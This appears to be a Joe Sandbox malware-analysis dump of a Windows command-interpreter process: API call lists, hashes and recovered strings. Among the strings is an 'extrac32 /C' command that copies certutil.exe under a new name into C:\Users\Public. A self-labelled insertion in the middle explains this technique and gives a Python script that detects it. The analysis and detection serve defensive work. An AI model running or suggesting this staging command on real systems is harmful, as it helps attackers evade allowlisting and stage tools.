                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationQueryToken
                                                      • String ID:
                                                      • API String ID: 4239771691-0
                                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                      • Instruction ID: 116135bfbdb0f23e76d4d3d4256b05823d7508cc48088b5cad67137537daebd7
                                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                      • Instruction Fuzzy Hash: FB11A573A08781CBEB10DF01E4007AAFBA4FB85795F808532DB4842794DBBDD598CB51
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FileInformation$HandleQueryVolume
                                                      • String ID:
                                                      • API String ID: 2149833895-0
                                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                      • Instruction ID: 79a233cdad7c402fca4ae30de9dbcfd45bbda6482f4788d1f1eab0e7cbc73cd6
                                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                      • Instruction Fuzzy Hash: 121173326087C286E760DB50F4417AEF7A0FB84B84F859636DA9D42A54DFFCD488CB51
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • towupper.MSVCRT ref: 00007FF7E1DB85D4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                      • String ID:
                                                      • API String ID: 3520273530-0
                                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                      • Instruction ID: a257dc2d6ed43407e1be52d76a0eeba85ac8cd414be202c1e3ed42f673392a23
                                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                      • Instruction Fuzzy Hash: 7C61DE22A0C20296E764FE24D146779E7A0FB04794F908537EA1E562D5DEBCE8A0C763
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationQueryToken
                                                      • String ID:
                                                      • API String ID: 4239771691-0
                                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                      • Instruction ID: b28cfebd276e7c7b9074f88430a0b3e5926370dc03486f56ddd28404b6902b88
                                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                      • Instruction Fuzzy Hash: B5F01CB3B04B81CBD7009F64E58589CB778F744B84795857ACB2903704DBB5D9A4CB50
                                                      APIs
                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC93BB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                      • Instruction ID: 73286feddc1c5b26e7f7702864a2838b64e5cd3ea43a728e64b3b1f5d6c1a025
                                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                      • Instruction Fuzzy Hash: 54B09210E25402E1D708FB229C8217452A0AB58711FC01832D00E80260DEACA19BCB11
                                                      APIs
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7E1DBF52A,00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF8DE
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF8FB
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF951
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF96B
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFA8E
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DBFB14
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFB2D
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFBEA
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DBF996
                                                        • Part of subcall function 00007FF7E1DC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7E1DD849D,?,?,?,00007FF7E1DDF0C7), ref: 00007FF7E1DC0045
                                                        • Part of subcall function 00007FF7E1DC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DC0071
                                                        • Part of subcall function 00007FF7E1DC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0092
                                                        • Part of subcall function 00007FF7E1DC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DC00A7
                                                        • Part of subcall function 00007FF7E1DC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC0181
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD401
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD41B
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD435
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD480
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 3964947564-518410914
                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                      • Instruction ID: 06ceacd9a7ff7348dd1fb9a944db3f578028f188226194ca4d9f31961f2d5e16
                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                      • Instruction Fuzzy Hash: 9D02A021E09A0296EB18FB21D8427B9F7A1FF49B55FD08537D90E422D4DFBCA550C3A2
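The String ID of the record above is the command line the dumped process was parsing: `extrac32 /C /Y C:\Windows\System32\certutil.exe C:\Users\Public\kn.exe` (the backslashes appear doubled in the recovered string). That is extrac32.exe, a signed Microsoft binary, used in its single-file copy mode (`/C`) to stage certutil.exe under a new name in a world-writable folder, so that later certutil activity runs from an image name HIPS rules and name-based allowlists do not recognise. The following detection is an added example, not part of the Joe Sandbox report or of any vendor rule: it parses process command lines, normalises the doubled-backslash form seen in memory dumps, and flags `extrac32 /C` copies whose source is a System32 binary. The sample command lines are constructed, and the watchlist and directory lists are analyst assumptions to be tuned per environment.

```python
"""Detect extrac32.exe used as a copy primitive to relocate System32 binaries.

Added example for the recovered string
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Everything below (directory lists, watchlist, sample command lines) is an
assumption of this example, not data from the sandbox report.
"""
import ntpath
from typing import List, Optional

# Directories holding OS binaries; a copy *out of* these is what we care about (assumption).
PROTECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# OS binaries whose relocation/rename is suspicious on its own (analyst watchlist, assumption).
WATCHLIST = {"certutil.exe", "cmd.exe", "extrac32.exe", "powershell.exe",
             "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Staging locations any local user can write to (assumption).
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace while honouring double quotes.

    Sufficient for copy/extract commands; it is not a full CommandLineToArgvW.
    """
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def normalize_path(path: str) -> str:
    """Lower-case and collapse the doubled backslashes seen in memory-dump/JSON strings."""
    return path.replace("\\\\", "\\").lower()


def check_extrac32_copy(cmdline: str) -> Optional[dict]:
    """Return a finding dict when cmdline is 'extrac32 /C <system32 binary> <dest>', else None."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return None
    image = ntpath.basename(normalize_path(tokens[0]))
    if image not in ("extrac32", "extrac32.exe"):
        return None
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    if "/c" not in switches:
        return None  # without /C extrac32 unpacks a .cab; that is its legitimate job
    operands = [normalize_path(t) for t in tokens[1:] if not t.startswith("/")]
    if len(operands) < 2:
        return None
    src, dst = operands[-2], operands[-1]
    src_dir = ntpath.dirname(src) + "\\"
    if not src_dir.startswith(PROTECTED_DIRS):
        return None  # copying user files around is not interesting here
    reasons = ["copies a file out of %s with extrac32 /C" % src_dir]
    if ntpath.basename(src) in WATCHLIST:
        reasons.append("source %s is a watchlisted LOLBin" % ntpath.basename(src))
    if ntpath.basename(src) != ntpath.basename(dst):
        reasons.append("destination renames it (%s -> %s)"
                       % (ntpath.basename(src), ntpath.basename(dst)))
    if dst.startswith(USER_WRITABLE):
        reasons.append("destination is a user-writable staging directory")
    return {"source": src, "destination": dst, "reasons": reasons}


def scan(cmdlines: List[str]) -> List[dict]:
    """Run the check over a batch of process-creation command lines."""
    return [f for f in (check_extrac32_copy(c) for c in cmdlines) if f is not None]


# Constructed sample command lines (not from the report's event log).
SAMPLE_CMDLINES = [
    # the string recovered from the dumped process, backslashes doubled as displayed there
    r"extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe",
    # same technique with a quoted image path, lower-case switches and a spaced destination
    r'"C:\Windows\System32\extrac32.exe" /y /c C:\Windows\System32\cmd.exe "C:\ProgramData\Update Service\svc.exe"',
    # legitimate use: unpacking a cabinet, no /C
    r"extrac32 /Y /E C:\Temp\drivers.cab /L C:\Temp\drivers",
    # /C on a user's own file: not a System32 source, ignored
    r"extrac32 /C C:\Users\alice\notes.txt C:\Users\alice\notes.bak",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding["source"], "->", finding["destination"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The check deliberately keys on the source directory rather than on the destination file name, because the destination name (`kn.exe` here) is chosen by the attacker and changes per campaign, while "a System32 binary leaving System32 via extrac32 /C" does not. Pair it with the certificate-store activity the report describes so that the later execution of the renamed copy is attributed back to this staging step.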
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$iswspacewcschr
                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                      • API String ID: 840959033-3627297882
                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction ID: c421526ab7fca0619a36b3f039d2c93d4f4f4737810d5a35944bd677fb0c8efc
                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction Fuzzy Hash: 3CD13A21E0864396EB14FB21A8473B9A7A0BF44B45FC48837D94E86295DFBCE445C7B2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                      • API String ID: 198002717-267741548
                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                      • Instruction ID: ca2de5f1459bd04552f6199a2311cc94333b015ccb357c4895388737f1f1b74d
                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                      • Instruction Fuzzy Hash: 6C510E25E0864795FB14EB11A8123BAEB60FF49B81FC4D576C90E83654DFBCE144C7A2
                                                      APIs
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF000
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF031
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigitiswspacewcschr
                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                      • API String ID: 1595556998-2755026540
                                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                      • Instruction ID: eb490af2ee3f44e31be0ea0f6010ee679c6cf7f280bf4d46f5c9871756d8ddef
                                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                      • Instruction Fuzzy Hash: 0A228AA5D08653A1FB64FB15A8427B9E6A0FF05791FC08133D98E822E4DFBCA4518773
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                      • String ID: "$=,;
                                                      • API String ID: 3545743878-4143597401
                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                      • Instruction ID: e423b7428915700ba977cf01605c71c9e1f85fd49b913115fd2b588b4524b2b5
                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                      • Instruction Fuzzy Hash: 3BC1A665E09A9692EB25EB1190027F9F6E1FF45F49FC58036CA4F02394EFBCE445C622
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentFormatMessageThread
                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                      • API String ID: 2411632146-3173542853
                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                      • Instruction ID: 76b759c309c8d26b09f79372d455d95665908449226ef56c0886792f83e96bad
                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                      • Instruction Fuzzy Hash: 5A617DB5A0964281EB24FF55A4467B5A3A0FF44B88FC48237DA4D43758CFBCE541C762
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CreateFile_open_osfhandle
                                                      • String ID: con
                                                      • API String ID: 2905481843-4257191772
                                                      • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction ID: 28c94b767a3f3a8ab91745c11f618c4a820b8c3368c99349bcebe8ad41540cb1
                                                      • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                      • Instruction Fuzzy Hash: BB71F572A086818AE720EF14E441379FAA0FB89B61F908636DE5E437D4DFBCD449CB51
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
• Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
